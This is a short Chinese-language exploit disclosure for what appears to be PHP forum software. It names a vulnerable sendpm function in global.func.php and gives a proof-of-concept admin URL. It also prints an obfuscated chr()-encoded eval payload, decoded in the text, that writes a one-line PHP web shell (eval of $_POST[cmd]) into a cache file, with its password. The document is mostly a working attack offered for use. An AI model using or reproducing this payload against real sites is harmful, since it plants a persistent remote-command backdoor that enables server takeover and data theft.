漏洞存在的文件,global.func.php: function sendpm($toid, $subject, $message, $fromid = '') { |
POC 漏洞测试代码: 1. admincp.php?frames=yes&action=members&operation=newsletter |
EXP 漏洞利用程序: ${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}} 以上代码功能为,生成PHP一句话木马。明文内容为:(fputs(fopen('forumdata/cache/cache_01.php','w'),'<?php eval($_POST[cmd])?>');) 如果漏洞利用代码执行成功,则在“forumdata/cache/cache_01.php”生成PHP一句话木马:<?php eval($_POST[cmd])?>,密码“cmd”。 |